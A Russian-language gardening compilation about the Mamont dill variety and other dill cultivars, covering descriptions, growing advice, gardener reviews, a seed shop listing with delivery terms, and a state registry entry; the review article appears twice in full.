0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Укроп мамонт описание

Укроп Мамонт: отзывы, фото, урожайность, выращивание

Укроп Мамонт – неприхотливый сорт, богатый на витамины и микроэлементы. Оригинатором этого сорта является «Ассоциация Биотехника» г. Санкт-Петербург, который был внесен в Государственный реестр в 2002 году. Подходит для выращивания на грядках во всех регионах страны.

Содержание:

Описание сорта

Укроп Мамонт, описание которого представлено далее, отличается дружным формированием зелени, продолжительным вегетационным периодом, высокой урожайностью. Относится к среднеспелым представителям. У укропа Мамонт замедленное образование стеблей и заложение соцветий, что является неотъемлемым плюсом этого сорта.

Листовая розетка мощная, наполовину приподнятая. Что касается листа, то он крупный, слегка покрытый восковым налетом. Куст высотой может достигать до 20 см, а во время цветения – до 1,5 м.

Для получения качественного и многочисленного урожая потребуется плодородная почва и частый полив, а также регулярная борьба с сорняками. Чтобы зелень укропа Мамонт была на столе до поздней осени, нужно проводить посевы с интервалом в две-три недели.

Характеристики

Укроп сорта Мамонт относится к холодоустойчивым сортам, но светолюбивым, поэтому при посеве стоит уделить особое внимание выбору подходящего места для посадки. Что касается влажности, то этот представитель любит регулярный полив, ведь от этого будет зависеть качество зелени.

Укроп Мамонт относится к кустовым представителям. Получить первую зелень, пригодную для употребления можно будет уже через 1,5 месяца после появления первых всходов. Используется для заморозки, консервирования, приготовления специй. Подходит для транспортировки на дальние расстояния, но при создании соответствующих условий. Отличается хорошими вкусовыми качествами. Обладает ярко-выраженным ароматом, присущим данной культуре.

Укроп Мамонт, описание сорта представлено выше, является урожайным. С одного растения можно собрать до 40 г зелени. С 1 м² получают до 1,5-1,7 кг листьев, а зелени для специи – до 2,9-3,1 кг. Зелень для употребления в пищу разрешается срезать уже через 1,5-2 месяца после появления первых всходов. Для получения качественной приправы укроп нужно выращивать в два раза дольше.

Укроп сорт Мамонтовый отличается своей устойчивостью к неблагоприятным погодным условиям и разным инфекционным заболеваниям. В редких случаях отмечается его поражение вредителями. Чтобы все-таки не столкнуться с проблемами, необходимо проводить профилактические мероприятия – предпосевная обработка грунта, протравливание семян собственного сбора, обработка кустов при повреждении патологиями или вредителями.

«За» и «против»

Укроп Мамонт, урожайность которого отличается высокими показателями, характеризуется большим количеством положительных сторон. К достоинствам сорта можно отнести:

  • высокое качество зелени и быстрое ее наращивание;
  • неприхотливость в уходе;
  • устойчивость к заболеваниям, вредителям, изменениям погодных условий;
  • быстрая и дружная всхожесть посевов;
  • разнообразие кулинарного применения;
  • использование в качестве средства народной медицины для устранения проблем со здоровьем.

Что касается недостатков, то согласно отзывам огородников об укропе Мамонт, они отсутствуют, что является еще одним плюсом.

Посадка и уход

Выращивать укроп можно двумя способами – сеять в открытый грунт или выращивать рассаду. Второй метод считается более трудоемким, поэтому лучше сразу высевать его на грядки. Можно сажать укроп Мамонт под пленку, чтобы получить более дружные всходы и получить урожай зелени на 2-3 недели раньше.

Также рекомендуется высевать укроп Мамонт в зиму. Традиционные сроки посева – ранняя весна, как только наступят первые теплые деньки, и земля прогреется до температуры +8˚+10˚C.

Предпочтительно выращивать укроп Мамонт на супесчаном и слабосуглинистом грунте, окультуренной и нейтральной почве. Разрешается использовать суперфосфат или нитроаммофоску при подготовке грядки к посеву. Глубокая заделка семян укропа Мамонт при посеве не потребуется, но нужно будет провести мульчирование торфом. Толщина мульчирующего слоя может составлять 1-1,5 см.

Выращивание укропа Мамонт не представляет особых трудностей даже для неопытных огородников. Стоит помнить, что зелень, как и иная огородная культура, требует ухода. При густых всходах проводится прореживание, между кустами рекомендуется оставлять расстояние не менее 5 см. Рыхление посадкам нужно после дождя или полива.

Поливать растение советуют по мере необходимости, но нельзя допускать растрескивания грунта. Обильно заливать грядки тоже не нужно, чтобы не спровоцировать гниение корневой системы. Согласно отзывам, для того, чтобы укроп Мамонт лучше рос, можно обрабатывать его Эпином или Цирконом для увеличения количества и качества урожая. Подкармливать укроп можно не позднее, чем за 3-4 недели до планируемой срезки зелени.

Болезни и вредители

Если при посадке и уходе за укропом Мамонт были соблюдены все рекомендации, то столкнуться с проблемой заболеваний и вредителей не придется. В редких случаях огородники замечают на растении корневую тлю, которая проникает на грядку вместе с семенами, которые не прошли предварительную обработку. Профилактической мерой в этой ситуации выступает раствор марганцовки, в котором протравливается посадочный материал в течение 10-17 минут.

У укропа Мамонт, фото которого подтверждают все его преимущества перед другими сортами, отмечается слабая устойчивость к фузариозному увяданию. Это заболевание развивается при резком перепаде температурного режима, повышенной влажности или похолодании. Чтобы не столкнуться с грибковыми инфекциями, нужно перед посевом грунт грядки обработать Триходермином.

Вывод

Укроп Мамонт является лучшим вариантом для получения качественного урожая. Он подходит для выращивания в домашних условиях и в открытом грунте во всех регионах страны. Что касается ухода, то этот сорт нетребователен и неприхотлив.

Отзывы огородников

Василиса, 36 лет, г. Уфа

Укроп любит вся моя семья, поэтому выращиваю я его на даче в большом количестве, сею несколько раз за сезон. Предпочтение отдаю сорту Мамонт, так как он прекрасно подходит для употребления в свежем виде и для заморозки. Сорт нравится и за то, что имеет дружные и хорошие всходы, мясистую и качественную зелень, не подвергается разным жучкам и болезням. Уход заключается только в качественном поливе. Пыталась выращивать этот сорт даже зимой на подоконнике, результат приятно удивил, поэтому могу с уверенностью советовать его всем, даже новичкам в огородном деле.

Павел, 50 лет, г. Калуга

Я отношусь к огородникам со стажем. Укроп Мамонт – мой любимый сорт, он по-настоящему оправдывает свое название. Культура отличается хорошей и сочной зеленью. Предпочитаю выращивать укроп рассадным методом, поэтому первую зелень на столе имею уже в середине-конце мая. Использую семена, которые собираю ежегодно сам, перед посевом их обязательно протравливаю, чтобы не столкнуться с тлей. Сорт мне нравится и за свою устойчивость к заболеваниям, вредителям.

Сергей, 28 лет, г. Москва

Решил заниматься огородом, чтобы всегда радовать семью домашними овощами и фруктами. При выборе зелени отдал предпочтение укропу сорта Мамонт. Семена покупал уже протравленные, при посеве соблюдал все рекомендации. Результат начал радовать спустя 1,5 месяца. В течение лета посев проводил 2 раза, каждый из которых получал качественную, густую и сочную зелень. Решил выращивать этот сорт теперь каждый год, ведь он не только хорош в салатах, но и для заморозки.

Обзор лучших сортов укропа на зелень и зонтики, рекомендации по их правильному выбору

В античные времена укроп использовали исключительно в качестве декоративного растения. Сегодня зеленые кустики растут на любом огороде и активно используются в приготовлении самых разнообразных блюд. Без укропа невозможно представить зимние заготовки или любимую всеми окрошку.

Среди разнообразия сортов важно выбрать те, которые отличаются простым уходом, приятным ароматом и хорошим вкусом, долгим сроком хранения. В статье рассмотрим описание лучших сортов укропа на зелень и зонтики и выясним сортовые отличия их разновидностей.

Виды укропа

Укроп бывает двух видов: на зелень и на зонтики.

Изучим подробно особенности каждого:

  1. Укроп на зелень. Неопытные огородники ошибочно предполагают, что у такого укропа отсутствуют зонтики. Однако это неверно, так как зонтики у растения все равно есть, просто появляются они позднее. Укроп на зелень долго сохраняет свою свежесть, поэтому его так любят многие дачники. У сортов на зелень высокая и стабильная урожайность, яркий аромат, насыщенный окрас. Кустики компактные, покрыты маленькими листиками.
  2. Укроп на зонтики. Высокие и мощные растения вырастают в хаотичном порядке по всему огороду. Желтые и зеленые зонтики применяют для консервации, они придают блюдам пряный травяной аромат. Зонтики также дают качественные семена, из которых на следующий сезон вырастает новый урожай.

Важно! Как и полагается, укроп бывает скороспелым, среднеспелым и поздним. Некоторые сорта высаживают на балконе или лоджии, некоторые — на приусадебных участках.

Лучшие сорта

Укроп неприхотлив в уходе, большинство сортов приживаются в любом климатическом регионе. Рассмотрим распространенные сорта и узнаем их сильные и слабые стороны.

Мамонт

Сорт на зелень Мамонт относится к среднеспелым. Обладает сочной и нежной зеленью с насыщенным свежим ароматом. Растение холодоустойчивое, подходит для выращивания как на юге страны, так и в Сибири. Предпочитает питательные рыхлые почвы с нейтральной кислотностью.

Для повышения урожайности перед посадкой грядки перекапывают и мульчируют. В уходе Мамонт не требует специальных знаний, главное поливать грядки и прореживать ряды, чтобы предотвратить появление насекомых-вредителей.

Созревание и отдача дружная, с 1 кв. м садоводы собирают 2-3 кг свежей зелени. Используют укроп для засушки или заморозки, добавляют в салаты и супы.

Интересно. Без укропа невозможно приготовить известный французский соус тартар. Для приготовления кроме зелени понадобятся маринованные огурцы, чеснок и майонез. Подают тартар к рыбе и морепродуктам, овощным гарнирам. Также укроп добавляют в консервированные огурчики, томаты и сладкий перец. Используют как зелень, так и зонтики.

Супердукат

Родина сорта с интересным названием Супердукат — Дания. Он позднеспелый, дачники собирают урожай спустя 100-105 дней с момента посадки. Кустики полураскидистые, розетка среднего размера. Листья насыщенного зеленого цвета, с сильным ароматом. Высаживают Супердукат на чистой и плодородной почве.

Поливают 1 раз в 5 дней, при недостатке влаги листочки грубеют. Оптимальная температура воды для полива не менее +18 °С. Увлажняют почву утром или вечером, чтобы избежать солнечных ожогов. При соблюдении всех агротехнических правил урожайность составляет около 3,5 кг с 1 кв. м. В применении Супердукат универсален.

Грибовский

Неприхотливый морозоустойчивый укроп созревает за 50-60 дней. Высаживают зелень в конце апреля-начале мая. Грибовский быстро растет на рыхлых и хорошо освещенных почвах. Помимо поливов, огородники регулярно организуют подкормки. Для этого используют органические вещества и минеральные компоненты: жидкий навоз, компост, калийную соль, суперфосфат.

Интервал между подкормками — 15-20 дней. Урожайность средняя, с 1 кв. м собирают около 1,5 кг. Укроп Грибовский входит в состав различных приправ для мяса и рыбы, обладает ярко выраженными вкусовыми качествами. Подходит для замораживания и употребления в свежем виде.

Салют

Позднеспелый сорт Салют рекомендуют высаживать рассадным способом. Это позволяет получить наилучшую урожайность и избежать распространенных болезней. Рассаду готовят за 2-3 недели до высадки укропа в грунт. Саженцы поливают только теплой водой и удобряют жидкой органикой.

Высаживают укроп на расстоянии 25-30 см друг от друга. Кустики у сорта Салют высокие, до 35 см. Листики густые, с легким восковым налетом. Вкус и аромат сильно выражены, укроп Салют засушивают на зиму и добавляют в блюда.

Интересно. Регулярное употребление укропа в небольших количествах способствует похудению. В зелени содержится особое эфирное масло с пряным ароматом. Оно ускоряет обмен веществ и выводит из организма вредные вещества. Укроп способствует избавлению организма от избыточной жидкости, предотвращает вздутие живота. Особенно эффективен укропный чай (на 1 л кипятка используют 2 пучка зелени).

Алмаз

У сорта Алмаз мощные кусты и густая розетка. Листья плотные и широкие, с сильным ароматом. Алмаз долго не цветет, поэтому собирают свежую зелень на протяжении всего лета. Высаживают растение рассадным способом. Помимо поливов и подкормок, огородники делают закаливание: выносят саженцы на балкон каждый день на 2-3 часа.

Закаливание укрепляет иммунитет растений и предотвращает развитие болезней. При появлении первого листочка рассаду пикируют — высаживают в емкость побольше. Пересаживают Алмаз в огород в начале мая, после заморозков. Используют укроп для приготовления ароматных специй и пряностей.

Лесногородский

Среднеспелый Лесногородский созревает за 65-70 дней с момента посадки. У полураскидистого куста крупные и широкие листья. Всхожесть дружная, в уходе сорт неприхотлив. Для получения богатого урожая в первые 7 дней кустики укрывают полиэтиленовой пленкой. Затем ее убирают и поливают грядки.

Цветение начинается лишь через 2 месяца после всходов. Вкусовые и товарные качества отменные. Высаживают Лесногородский и на балконе или подоконнике. Для этого приобретают пластмассовые контейнеры с поддонами. Они мало весят и удобны в эксплуатации.

Обильнолистный

Кустовой сорт Обильнолистный имеет иммунитет перед насекомыми-вредителями, редко болеет. Зелень среднеспелая, урожай ранний, собирают его спустя 40 дней с момента посадки. Всхожесть дружная, кустики средней высоты.

В посадке и уходе неприхотлив, пользуется популярностью у огородников средней полосы России. Вкус нежный, приятный. Обильнолистный добавляют в салаты из свежих овощей, закуски и вторые блюда. Аромат невыраженный, нейтральный.

Амазон

Среднеспелый сорт Амазон созревает за 40-45 дней. Высаживают как рассадой, так и семенами в открытый грунт. Розетка слегка приподнятая, смотрит вверх. Листьев много, укроп сочный и ароматный. Сорт на зелень чувствителен к поливам, поэтому садоводы используют только чистую и теплую воду.

В остальном Амазон неприхотлив, за сезон его 1-2 раза подкармливают органикой или минералами. Собирают урожай в конце июня-начале июля. Употребляют укроп в свежем виде, замораживают и сушат на зиму. Амазон до полугода не теряет своих вкусовых и внешних качеств.

Интересно. В XVII веке укроп наделяли магической силой и использовали в качестве оберегов и талисманов от нечистой силы. Пучки развешивали по всему дому и у входной двери.

Борей

Высокорослый многолетний сорт Борей созревает за 50-60 дней. Кусты высокие, до 120 см. Борей устойчив к болезням и вредителям, без последствий переносит заморозки и частые дожди. Облиственность густая, зонтики укропа обладают ярким ароматом. Урожайность стабильная, с 1 кв. м собирают около 4 кг зелени. Борей подходит для заморозки и для употребления в свежем виде.

Анкер

Для посадки сорта Анкер используют крупные семена, предварительно обеззаразив их в растворе марганцовки или борной кислоты. Для повышения урожайности семенной материал проращивают на протяжении 5-7 дней. Для этого семечки заворачивают во влажную марлю и убирают в теплое место, периодически добавляя немного воды.

Для посадки выбирают пасмурный безветренный день. Вырастает Анкер за 65-70 дней, кусты крупные и мощные. Сорт с 1 кв. м дает до 3 кг зонтиков и укропов. Аромат яркий, пряный.

Атаман

Огородники ценят сорт Атаман за высокие товарные и вкусовые качества. Сажать рекомендуют в почвах с нейтральной кислотностью. Грядки предварительно очищают от мусора и перекапывают. Светолюбивый Атаман созревает за 50-55 дней. Кусты средней высоты, раскидистые, окрас ярко-зеленый. Добавляют перец в свежем и сушеном виде в маринады, салаты и соусы.

Как выбрать подходящий сорт

Выбор сорта зависит от ряда факторов: регион выращивания, предназначение, посадка и уход. Одни огородники выбирают неприхотливые сорта для юга, другие — для северных регионов.

Критерии выбора

В первую очередь обращают внимание на сроки созревания зелени. Для умеренной полосы России выбирают скороспелый укроп, в условиях короткого и прохладного лета растение не успевает заболеть и показывает наилучшую урожайность. Для юга подходят позднеспелые кустики в растянутым периодом плодоношения.

Также важно учитывать цель применения укропа: сорта Амазон и Салют отлично подходят для заморозки, а Борей — для приготовления зимних заготовок. Для получения зелени выращивают Лесногородский, Алмаз и Мамонт.

Важно! Теплолюбивые сорта, такие как Амазон и Обильнолистный, выращивают в тепличных условиях. Холодоустойчивые — Лесногородский и Грибовский — в открытых грядках. Перед покупкой семян огородники внимательно читают рекомендации на упаковке от производителя.

Подбор сорта в зависимости от региона выращивания

Количество урожая зависит не только от соблюдения агротехнических правил, но также и от региона выращивания:

  1. Для южных регионов характерны плодородные питательные почвы, теплый климат, продолжительное лето, отсутствие заморозков. В таких условиях себя прекрасно показывают Супердукат и Салют.
  2. Для выращивания в областях с резкими переменами погоды и коротким летом рекомендуют сорта Грибовский и Мамонт. Сорта холодоустойчивы, меньше подвержены воздействию насекомых.

Отзывы фермеров

Одни предпочитают выращивать укроп на зелень, другим нравится получать ароматные зонтики. Изучим несколько отзывов от опытных огородников.

Мария, г. Ростов-на-Дону: «Люблю зелень, в особенности укроп. Лучшие сорта — Салют и Алмаз. Душистые и ароматные кустики радуют урожаем по 1,5-2 месяца. Высаживаю их после картофеля или капусты, поливаю и пару раз за сезон удобряю жидким пометом. Вкус приятный, добавляю укроп в супы и салаты, а часть замораживаю на зиму».

Лиля, г. Уфа: «Соседка посоветовала посадить укроп Грибовский. Урожаем я осталась довольна. Кусты средней высоты, зелень нежная, листики небольшие. Укроп не болел, сорняков было мало. Рекомендую Грибовский к посадке».

Роман, г. Тюмень: «Посадил укроп Мамонт рассадным способом. Кусты всходили медленно, кончики листьев желто-зеленого оттенка. Несколько растений вообще засохло, хотя поливал регулярно. Остался разочарован».

Заключение

Лучшие сорта укропа на зелень — Салют и Алмаз, на зонтики — Борей и Анкер. Для северных регионов используют рассадный способ посадки, на юге и в средней полосе высаживают семенами. Посевной материал дезинфицируют и проращивают, чтобы увеличить всхожесть. В уходе укроп не требует специальных знаний агротехники, достаточно соблюдать севооборот, режим поливов и подкормок.

Также почву регулярно рыхлят и удаляют сорняки — это улучшает качество земли, насыщает корни растения кислородом. Собирают урожай с июля по август. Хозяйки добавляют зелень в блюда, замораживают и сушат. Зимой зелень всегда к столу — она придаст ужину пряный аромат и обогатит организм витаминами и минералами.

Обзор лучших сортов укропа на зелень и зонтики, рекомендации по их правильному выбору

В античные времена укроп использовали исключительно в качестве декоративного растения. Сегодня зеленые кустики растут на любом огороде и активно используются в приготовлении самых разнообразных блюд. Без укропа невозможно представить зимние заготовки или любимую всеми окрошку.

Среди разнообразия сортов важно выбрать те, которые отличаются простым уходом, приятным ароматом и хорошим вкусом, долгим сроком хранения. В статье рассмотрим описание лучших сортов укропа на зелень и зонтики и выясним сортовые отличия их разновидностей.

Виды укропа

Укроп бывает двух видов: на зелень и на зонтики.

Изучим подробно особенности каждого:

  1. Укроп на зелень. Неопытные огородники ошибочно предполагают, что у такого укропа отсутствуют зонтики. Однако это неверно, так как зонтики у растения все равно есть, просто появляются они позднее. Укроп на зелень долго сохраняет свою свежесть, поэтому его так любят многие дачники. У сортов на зелень высокая и стабильная урожайность, яркий аромат, насыщенный окрас. Кустики компактные, покрыты маленькими листиками.
  2. Укроп на зонтики. Высокие и мощные растения вырастают в хаотичном порядке по всему огороду. Желтые и зеленые зонтики применяют для консервации, они придают блюдам пряный травяной аромат. Зонтики также дают качественные семена, из которых на следующий сезон вырастает новый урожай.

Важно! Как и полагается, укроп бывает скороспелым, среднеспелым и поздним. Некоторые сорта высаживают на балконе или лоджии, некоторые — на приусадебных участках.

Лучшие сорта

Укроп неприхотлив в уходе, большинство сортов приживаются в любом климатическом регионе. Рассмотрим распространенные сорта и узнаем их сильные и слабые стороны.

Мамонт

Сорт на зелень Мамонт относится к среднеспелым. Обладает сочной и нежной зеленью с насыщенным свежим ароматом. Растение холодоустойчивое, подходит для выращивания как на юге страны, так и в Сибири. Предпочитает питательные рыхлые почвы с нейтральной кислотностью.

Для повышения урожайности перед посадкой грядки перекапывают и мульчируют. В уходе Мамонт не требует специальных знаний, главное поливать грядки и прореживать ряды, чтобы предотвратить появление насекомых-вредителей.

Созревание и отдача дружная, с 1 кв. м садоводы собирают 2-3 кг свежей зелени. Используют укроп для засушки или заморозки, добавляют в салаты и супы.

Интересно. Без укропа невозможно приготовить известный французский соус тартар. Для приготовления кроме зелени понадобятся маринованные огурцы, чеснок и майонез. Подают тартар к рыбе и морепродуктам, овощным гарнирам. Также укроп добавляют в консервированные огурчики, томаты и сладкий перец. Используют как зелень, так и зонтики.

Супердукат

Родина сорта с интересным названием Супердукат — Дания. Он позднеспелый, дачники собирают урожай спустя 100-105 дней с момента посадки. Кустики полураскидистые, розетка среднего размера. Листья насыщенного зеленого цвета, с сильным ароматом. Высаживают Супердукат на чистой и плодородной почве.

Поливают 1 раз в 5 дней, при недостатке влаги листочки грубеют. Оптимальная температура воды для полива не менее +18 °С. Увлажняют почву утром или вечером, чтобы избежать солнечных ожогов. При соблюдении всех агротехнических правил урожайность составляет около 3,5 кг с 1 кв. м. В применении Супердукат универсален.

Грибовский

Неприхотливый морозоустойчивый укроп созревает за 50-60 дней. Высаживают зелень в конце апреля-начале мая. Грибовский быстро растет на рыхлых и хорошо освещенных почвах. Помимо поливов, огородники регулярно организуют подкормки. Для этого используют органические вещества и минеральные компоненты: жидкий навоз, компост, калийную соль, суперфосфат.

Интервал между подкормками — 15-20 дней. Урожайность средняя, с 1 кв. м собирают около 1,5 кг. Укроп Грибовский входит в состав различных приправ для мяса и рыбы, обладает ярко выраженными вкусовыми качествами. Подходит для замораживания и употребления в свежем виде.

Салют

Позднеспелый сорт Салют рекомендуют высаживать рассадным способом. Это позволяет получить наилучшую урожайность и избежать распространенных болезней. Рассаду готовят за 2-3 недели до высадки укропа в грунт. Саженцы поливают только теплой водой и удобряют жидкой органикой.

Высаживают укроп на расстоянии 25-30 см друг от друга. Кустики у сорта Салют высокие, до 35 см. Листики густые, с легким восковым налетом. Вкус и аромат сильно выражены, укроп Салют засушивают на зиму и добавляют в блюда.

Интересно. Регулярное употребление укропа в небольших количествах способствует похудению. В зелени содержится особое эфирное масло с пряным ароматом. Оно ускоряет обмен веществ и выводит из организма вредные вещества. Укроп способствует избавлению организма от избыточной жидкости, предотвращает вздутие живота. Особенно эффективен укропный чай (на 1 л кипятка используют 2 пучка зелени).

Алмаз

У сорта Алмаз мощные кусты и густая розетка. Листья плотные и широкие, с сильным ароматом. Алмаз долго не цветет, поэтому собирают свежую зелень на протяжении всего лета. Высаживают растение рассадным способом. Помимо поливов и подкормок, огородники делают закаливание: выносят саженцы на балкон каждый день на 2-3 часа.

Закаливание укрепляет иммунитет растений и предотвращает развитие болезней. При появлении первого листочка рассаду пикируют — высаживают в емкость побольше. Пересаживают Алмаз в огород в начале мая, после заморозков. Используют укроп для приготовления ароматных специй и пряностей.

Лесногородский

Среднеспелый Лесногородский созревает за 65-70 дней с момента посадки. У полураскидистого куста крупные и широкие листья. Всхожесть дружная, в уходе сорт неприхотлив. Для получения богатого урожая в первые 7 дней кустики укрывают полиэтиленовой пленкой. Затем ее убирают и поливают грядки.

Цветение начинается лишь через 2 месяца после всходов. Вкусовые и товарные качества отменные. Высаживают Лесногородский и на балконе или подоконнике. Для этого приобретают пластмассовые контейнеры с поддонами. Они мало весят и удобны в эксплуатации.

Обильнолистный

Кустовой сорт Обильнолистный имеет иммунитет перед насекомыми-вредителями, редко болеет. Зелень среднеспелая, урожай ранний, собирают его спустя 40 дней с момента посадки. Всхожесть дружная, кустики средней высоты.

В посадке и уходе неприхотлив, пользуется популярностью у огородников средней полосы России. Вкус нежный, приятный. Обильнолистный добавляют в салаты из свежих овощей, закуски и вторые блюда. Аромат невыраженный, нейтральный.

Амазон

Среднеспелый сорт Амазон созревает за 40-45 дней. Высаживают как рассадой, так и семенами в открытый грунт. Розетка слегка приподнятая, смотрит вверх. Листьев много, укроп сочный и ароматный. Сорт на зелень чувствителен к поливам, поэтому садоводы используют только чистую и теплую воду.

В остальном Амазон неприхотлив, за сезон его 1-2 раза подкармливают органикой или минералами. Собирают урожай в конце июня-начале июля. Употребляют укроп в свежем виде, замораживают и сушат на зиму. Амазон до полугода не теряет своих вкусовых и внешних качеств.

Интересно. В XVII веке укроп наделяли магической силой и использовали в качестве оберегов и талисманов от нечистой силы. Пучки развешивали по всему дому и у входной двери.

Борей

Высокорослый многолетний сорт Борей созревает за 50-60 дней. Кусты высокие, до 120 см. Борей устойчив к болезням и вредителям, без последствий переносит заморозки и частые дожди. Облиственность густая, зонтики укропа обладают ярким ароматом. Урожайность стабильная, с 1 кв. м собирают около 4 кг зелени. Борей подходит для заморозки и для употребления в свежем виде.

Анкер

Для посадки сорта Анкер используют крупные семена, предварительно обеззаразив их в растворе марганцовки или борной кислоты. Для повышения урожайности семенной материал проращивают на протяжении 5-7 дней. Для этого семечки заворачивают во влажную марлю и убирают в теплое место, периодически добавляя немного воды.

Для посадки выбирают пасмурный безветренный день. Вырастает Анкер за 65-70 дней, кусты крупные и мощные. Сорт с 1 кв. м дает до 3 кг зонтиков и укропов. Аромат яркий, пряный.

Атаман

Огородники ценят сорт Атаман за высокие товарные и вкусовые качества. Сажать рекомендуют в почвах с нейтральной кислотностью. Грядки предварительно очищают от мусора и перекапывают. Светолюбивый Атаман созревает за 50-55 дней. Кусты средней высоты, раскидистые, окрас ярко-зеленый. Добавляют перец в свежем и сушеном виде в маринады, салаты и соусы.

Как выбрать подходящий сорт

Выбор сорта зависит от ряда факторов: регион выращивания, предназначение, посадка и уход. Одни огородники выбирают неприхотливые сорта для юга, другие — для северных регионов.

Критерии выбора

В первую очередь обращают внимание на сроки созревания зелени. Для умеренной полосы России выбирают скороспелый укроп, в условиях короткого и прохладного лета растение не успевает заболеть и показывает наилучшую урожайность. Для юга подходят позднеспелые кустики в растянутым периодом плодоношения.

Также важно учитывать цель применения укропа: сорта Амазон и Салют отлично подходят для заморозки, а Борей — для приготовления зимних заготовок. Для получения зелени выращивают Лесногородский, Алмаз и Мамонт.

Важно! Теплолюбивые сорта, такие как Амазон и Обильнолистный, выращивают в тепличных условиях. Холодоустойчивые — Лесногородский и Грибовский — в открытых грядках. Перед покупкой семян огородники внимательно читают рекомендации на упаковке от производителя.

Подбор сорта в зависимости от региона выращивания

Количество урожая зависит не только от соблюдения агротехнических правил, но также и от региона выращивания:

  1. Для южных регионов характерны плодородные питательные почвы, теплый климат, продолжительное лето, отсутствие заморозков. В таких условиях себя прекрасно показывают Супердукат и Салют.
  2. Для выращивания в областях с резкими переменами погоды и коротким летом рекомендуют сорта Грибовский и Мамонт. Сорта холодоустойчивы, меньше подвержены воздействию насекомых.

Отзывы фермеров

Одни предпочитают выращивать укроп на зелень, другим нравится получать ароматные зонтики. Изучим несколько отзывов от опытных огородников.

Мария, г. Ростов-на-Дону: «Люблю зелень, в особенности укроп. Лучшие сорта — Салют и Алмаз. Душистые и ароматные кустики радуют урожаем по 1,5-2 месяца. Высаживаю их после картофеля или капусты, поливаю и пару раз за сезон удобряю жидким пометом. Вкус приятный, добавляю укроп в супы и салаты, а часть замораживаю на зиму».

Лиля, г. Уфа: «Соседка посоветовала посадить укроп Грибовский. Урожаем я осталась довольна. Кусты средней высоты, зелень нежная, листики небольшие. Укроп не болел, сорняков было мало. Рекомендую Грибовский к посадке».

Роман, г. Тюмень: «Посадил укроп Мамонт рассадным способом. Кусты всходили медленно, кончики листьев желто-зеленого оттенка. Несколько растений вообще засохло, хотя поливал регулярно. Остался разочарован».

Заключение

Лучшие сорта укропа на зелень — Салют и Алмаз, на зонтики — Борей и Анкер. Для северных регионов используют рассадный способ посадки, на юге и в средней полосе высаживают семенами. Посевной материал дезинфицируют и проращивают, чтобы увеличить всхожесть. В уходе укроп не требует специальных знаний агротехники, достаточно соблюдать севооборот, режим поливов и подкормок.

Также почву регулярно рыхлят и удаляют сорняки — это улучшает качество земли, насыщает корни растения кислородом. Собирают урожай с июля по август. Хозяйки добавляют зелень в блюда, замораживают и сушат. Зимой зелень всегда к столу — она придаст ужину пряный аромат и обогатит организм витаминами и минералами.

Укроп Мамонт Семена от Октябрины Ганичкиной 3 гр

Подробное описание

Среднеспелый сорт, от всходов до уборки на зелень 42 дня, на специи — 86 дней. Розетка листьев полуприподнятая. Лист крупный, серовато-зеленый с сильным восковым налетом, среднерассеченный. Масса 1 растения при уборке на зелень 7-8 г, на специи — 21-24 г. Ароматичность отличная. Растение в фазе цветения высотой 150-160 см, компактное. Урожайность (выход зеленой массы) — 2-3 кг/м2. Сорт отличается стабильно высокой урожайностью, поздним формированием соцветий, высокой ароматичностью. Выращивается для получения зелени и специй. Используется в свежем виде и для переработки. Агротехника: Укроп — холодостойкая и светолюбивая культура, предпочитает легкосуглинистые или супесчаные почвы, рН-нейтральные, хорошо окультуренные. Семена высевают в несколько сроков с интервалом 10-12 дней, начиная с середины апреля — начала мая. Семена высевают рядками или сплошным способом на глубину 2-3 см. Срезку проводят по мере отрастания зеленой массы. Для получения более ранней зелени, укроп высевают под зиму, во второй декаде октября.

Размеры и вес (брутто)

Дополнительная информация
Страна производства: Польша
Срок годности: 24 месяца

Похожие товары

Физалис Кондитер Семена от Октябрины Ганичкиной 0,5 гр

Чабер Ароматный Семена от Октябрины Ганичкиной 2 г

Тимьян овощной Медок

Укроп Гренадер ГАВРИШ

Шпинат жирнолистный Семена от Октябрины Ганичкиной раннеспелый 2 г

Салат смесь листовых сортов Семена от Октябрины Ганичкиной 1 г

Семена петрушки кудрявой ПОИСК Кучерявец

Салат Берлинский желтый JOHNSONS

Доставка онлайн-заказов

Товары, заказанные в интернет-магазине ОБИ, доставляются по Москве и Московской области в пределах 50 км от МКАД. Стоимость доставки автоматически рассчитывается при оформлении онлайн-заказа, исходя из веса товара и зоны доставки.

Минимальная сумма заказа для бесплатной доставки:

Доставим Ваш заказ бесплатно, если адрес доставки располагается в первой зоне доставки онлайн-заказов, а также:

  • >5 000,00 ₽ — для заказов весом до 5,0 кг
  • >10 000,00 ₽ — для заказов весом до 30,0 кг

Курьерская служба доставляет малогабаритные заказы (весом до 30 кг) до дверей покупателя, крупногабаритные — до подъезда (калитки, ворот) дома. Доставка включает бесплатную выгрузку товаров из машины и их перенос в пределах 10 м.

Дата и время доставки

Доставка на следующий день возможна при размещении заказа до 18:00. Вам будет предложен на выбор один из двух 7-часовых интервалов доставки:

  • — с 10:00 до 16:00
  • — с 15:00 до 22:00

Если вы хотите сократить период ожидания, за дополнительную плату можно выбрать один из 3-часовых интервалов доставки:

  • — с 10:00 до 13:00 +350,00 ₽.
  • — с 13:00 до 16:00 +300,00 ₽.
  • — с 16:00 до 19:00 +300,00 ₽.
  • — с 19:00 до 22:00 +350,00 ₽.

Перенос даты и изменение временного интервала доставки возможно не позднее, чем за 24 часа до согласованной ранее даты и времени.

Подробнее ознакомиться с условиями работы курьерской службы можно в разделе Доставка интернет-заказов.

Мамонт — сорт растения Укроп

Характеристики сорта:

Свойства сорта Мамонт:

Рекомендуемый регион на карте:

Информация о допуске Укроп Мамонт из Реестра Госсорткомиссии РФ

Заявка на допуск №34923 , зарегистрирована 2000-12-19 . Сорт Укроп Мамонт включен в реестр допущенных в 2002 году . Допущен к использованию в регионах: Все регионы .

Оригинатором сорта Укроп Мамонт является:

  • САНКТ-ПЕТЕРБУРГСКАЯ РЕГИОНАЛ. ОБЩЕСТ. ОРГАНИЗАЦИЯ `СОЮЗ ПРОИЗВОДИТЕЛЕЙ СЕМЯН `АССОЦИАЦИЯ БИОТЕХНИКА`
    (190098, Г.САНКТ-ПЕТЕРБУРГ, КОННОГВАРДЕЙСКИЙ Б-Р, Д.19, ОФ.111)

Другие сорта растения Укроп

Поиск сорта по названию
Подбор сорта
Вопрос экспертам портала

Если вы не нашли ответ на вопрос — не стесняйтесь, задайте вопрос эксперту.

Зарегистрируйтесь или Войдите, чтобы каждый раз не указывать Имя и Электронную почту

Спасибо за комментарий! Он будет опубликован после проверки модератором!

Комментариев еще нет, станьте первым!

